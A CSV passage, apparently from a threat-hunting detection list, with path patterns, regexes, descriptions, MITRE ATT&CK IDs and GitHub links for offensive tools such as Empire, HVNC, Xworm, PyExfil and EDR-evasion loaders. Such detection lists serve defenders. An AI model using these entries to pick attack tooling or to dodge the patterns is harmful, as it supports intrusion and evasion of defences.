","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*\hijackers\*",".{0,1000}\\hijackers\\.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*\HijackHunter\*",".{0,1000}\\HijackHunter\\.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\hiphp-cli.sh*",".{0,1000}\\hiphp\-cli\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*\hiphp-desktop.sh*",".{0,1000}\\hiphp\-desktop\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*\HiveDump.ps1*",".{0,1000}\\HiveDump\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\hoaxshell\*.py*",".{0,1000}\\hoaxshell\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*\HookDetector.csproj*",".{0,1000}\\HookDetector\.csproj.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\HookDetector.exe*",".{0,1000}\\HookDetector\.exe.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\HostEnum.ps1*",".{0,1000}\\HostEnum\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*\HostEnum.ps1*",".{0,1000}\\HostEnum\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\HostRecon.ps1*",".{0,1000}\\HostRecon\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\HTMLSmuggler\*",".{0,1000}\\HTMLSmuggler\\.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","0","N/A","10","2","135","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z" "*\http_exfiltration.py*",".{0,1000}\\http_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\http_SCNotification.exe",".{0,1000}\\http_SCNotification\.exe","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*\httprelayserver.py*",".{0,1000}\\httprelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*\http-request-smuggler\*",".{0,1000}\\http\-request\-smuggler\\.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*\huan.exe *",".{0,1000}\\huan\.exe\s.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","525","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*\hvnc.exe*",".{0,1000}\\hvnc\.exe.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*\HVNC.sln*",".{0,1000}\\HVNC\.sln.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*\HVNC.vcxproj*",".{0,1000}\\HVNC\.vcxproj.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*\HVNC-main.zip*",".{0,1000}\\HVNC\-main\.zip.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*\HVNC-Server.exe*",".{0,1000}\\HVNC\-Server\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\HWSyscalls.cpp*",".{0,1000}\\HWSyscalls\.cpp.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*\HWSyscalls-Example.*",".{0,1000}\\HWSyscalls\-Example\..{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*\hXOR.exe*",".{0,1000}\\hXOR\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*\hXOR-Packer v0.1\*",".{0,1000}\\hXOR\-Packer\sv0\.1\\.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*\hXOR-Packer\*",".{0,1000}\\hXOR\-Packer\\.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*\hyperion.exe*",".{0,1000}\\hyperion\.exe.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\Hypnos.exe*",".{0,1000}\\Hypnos\.exe.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*\Hypnos.sln*",".{0,1000}\\Hypnos\.sln.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*\Hypnos.vcxproj*",".{0,1000}\\Hypnos\.vcxproj.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*\Hypnos-main\*",".{0,1000}\\Hypnos\-main\\.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*\iat_obfuscation.exe*",".{0,1000}\\iat_obfuscation\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\icebreaker.py*",".{0,1000}\\icebreaker\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*\icmp_exfiltration.py*",".{0,1000}\\icmp_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\identify_offencive_tools.log*",".{0,1000}\\identify_offencive_tools\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\IDiagnosticProfileUAC*",".{0,1000}\\IDiagnosticProfileUAC.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","10","2","175","31","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*\iepv.cfg*",".{0,1000}\\iepv\.cfg.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\iepv.exe*",".{0,1000}\\iepv\.exe.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\IEPV.EXE-*.pf*",".{0,1000}\\IEPV\.EXE\-.{0,1000}\.pf.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\iepv.zip.lnk*",".{0,1000}\\iepv\.zip\.lnk.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\iis_controller.py*",".{0,1000}\\iis_controller\.py.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*\impacket.*",".{0,1000}\\impacket\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\impacket.zip*",".{0,1000}\\impacket\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\impacket-out\*",".{0,1000}\\impacket\-out\\.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*\Impersonate.exe*",".{0,1000}\\Impersonate\.exe.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*\impersonate.py*",".{0,1000}\\impersonate\.py.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*\impersonate.py*",".{0,1000}\\impersonate\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\Impersonate\Impersonate.cpp*",".{0,1000}\\Impersonate\\Impersonate\.cpp.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*\Implant.exe *",".{0,1000}\\Implant\.exe\s.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*\implant.exe *.exe",".{0,1000}\\implant\.exe\s.{0,1000}\.exe","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*\Implants\powershell.ps1*",".{0,1000}\\Implants\\powershell\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*\ImplantSSP.exe*",".{0,1000}\\ImplantSSP\.exe.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\InactiveDomainAdmins.csv*",".{0,1000}\\InactiveDomainAdmins\.csv.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*\inceptor.py*",".{0,1000}\\inceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*\include\KaynStrike.h*",".{0,1000}\\include\\KaynStrike\.h.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*\include\kerberoast.h*",".{0,1000}\\include\\kerberoast\.h.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*\InflativeLoading.py*",".{0,1000}\\InflativeLoading\.py.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*\InflativeLoading\bin\*.bin*",".{0,1000}\\InflativeLoading\\bin\\.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*\InflativeLoading\bin\*.exe*",".{0,1000}\\InflativeLoading\\bin\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*\InflativeLoading-main.zip*",".{0,1000}\\InflativeLoading\-main\.zip.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*\InfoGrab.dll*",".{0,1000}\\InfoGrab\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\inject_shellcode.py*",".{0,1000}\\inject_shellcode\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\injector.ps1 1 *",".{0,1000}\\injector\.ps1\s1\s.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts 